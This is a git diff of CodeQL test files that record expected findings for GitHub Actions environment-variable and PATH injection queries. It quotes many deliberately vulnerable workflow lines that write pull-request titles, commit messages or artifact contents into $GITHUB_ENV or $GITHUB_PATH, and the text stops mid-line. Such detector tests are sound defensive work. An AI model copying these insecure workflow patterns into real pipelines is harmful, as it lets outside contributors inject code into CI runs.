.github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref index 01345ebb915b..80f72124fe45 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref @@ -1,2 +1 @@ -query: Security/CWE-077/EnvPathInjectionCritical.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-077/EnvPathInjectionCritical.ql diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected index d18365265b8f..5be9f729ad64 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected @@ -1,4 +1,3 @@ -#select edges | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | Config | | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | Config | @@ -17,3 +16,4 @@ nodes | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | semmle.label | echo "::add-path::$PATHINJ" | subpaths +#select diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref index e61216acaa43..165a3d20896b 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref @@ -1,2 +1 @@ -query: Security/CWE-077/EnvPathInjectionMedium.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-077/EnvPathInjectionMedium.ql diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index 85035023f666..9914ae91df12 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected @@ -1,40 +1,3 @@ -#select -| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:3:3:3:14 | workflow_run | workflow_run | -| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:3:3:3:14 | workflow_run | workflow_run | -| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:3:3:3:14 | workflow_run | workflow_run | -| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test7.yml:16:9:24:35 | Uses Step | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Uses Step | .github/workflows/test7.yml:4:5:4:16 | workflow_run | workflow_run | -| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:3:3:3:21 | pull_request_target | pull_request_target | -| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:3:3:3:21 | pull_request_target | pull_request_target | -| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body 